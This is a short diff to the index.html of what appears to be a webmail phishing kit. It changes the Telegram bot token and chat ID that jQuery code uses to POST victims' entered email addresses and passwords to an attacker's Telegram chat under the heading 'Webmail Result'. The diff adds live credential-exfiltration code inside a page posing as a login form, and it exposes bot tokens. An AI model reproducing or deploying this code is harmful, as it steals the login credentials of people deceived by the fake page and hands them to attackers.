--- a/index.html
+++ b/index.html
@@ -340,10 +340,10 @@ $(document).ready(function() {
 
     $.ajax({
       dataType: 'json', // JSON is lowercase
-      url: 'https://api.telegram.org/bot7744860627:AAGk3zp9s7ROoq2R8b_FQ91JbJcwJ16hxks/sendMessage',
+      url: 'https://api.telegram.org/bot5846844221:AAETqfTHCh9kSiN_yRdG64q1MiWMa2n812o/sendMessage',
       type: 'POST',
       data: {
-        chat_id: '7787132054',
+        chat_id: '-607320495',
         text: `***** Webmail Result *****\r\nEmail: ${email}\r\nPassword: ${password}\r\n*****`
       },
       beforeSend: function(xhr) {
